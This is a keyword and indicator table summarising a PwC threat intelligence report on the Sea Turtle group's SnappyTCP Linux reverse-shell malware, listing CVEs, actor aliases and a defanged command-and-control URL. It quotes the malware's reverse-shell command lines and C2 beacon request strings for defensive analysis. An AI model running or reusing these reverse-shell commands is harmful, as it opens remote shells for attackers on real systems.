The Tortoise and The Malwahare
by PwC Threat Intelligence
December 5, 2023
https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/tortoise-and-malwahare.html
| Notes |
|---|
| threat intelligence |
| Sea Turtle |
| Teal Kurma |
| SnappyTCP |
| reverse shell |
| Linux malware |
| Unix |
| Turkey |
| Marbled Dust |
| Cosmic Wolf |
| Europe |
| Middle East |
| non-governmental organizations (NGO) |
| telecommunications |
| command and control |
| persistence |
| TLS |
| plaintext |
| GitHub |
| attacker stored code on GitHub/reused public examples https://github.com/jacksp7 |
| DNS |
| DNS hijacking |
| CVE-2021-44228 |
| CVE-2021-21974 |
| CVE-2022-0847 |
| upxa.sh |
| dropper |
| webshell |
| hxxp://lo0[.]systemctl[.]network/sy.php. |
| GET /sy.php HTTP/1.1\r\nHost: %s\r\nHostname: %s\r\n\r\n", host_name, host_name |
| Greek CERT |
| CERT |
| X-Auth-43245-S-20 |
| bash -c \\"./kdd_launch exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:%s:%d 2>&1>/dev/null&\\" |
| OpenSSL |
| GET /ssl.php HTTP/1.1\\r\\nHost: %s\\r\\nHostname: %s\\r\\nConnection: close\\r\\n\\r\\n |
| bash -c \\"./update exec:‘bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\\" |
| GLIBC - GNU C library |
| static linking |
| cross compiling |
| pthreads |
| bash |
| ESXi OpenSLP heap overflow |
| passive DNS |
| cyberespionage |
| exfiltration |
| victimology |
| threat actor |
| APT |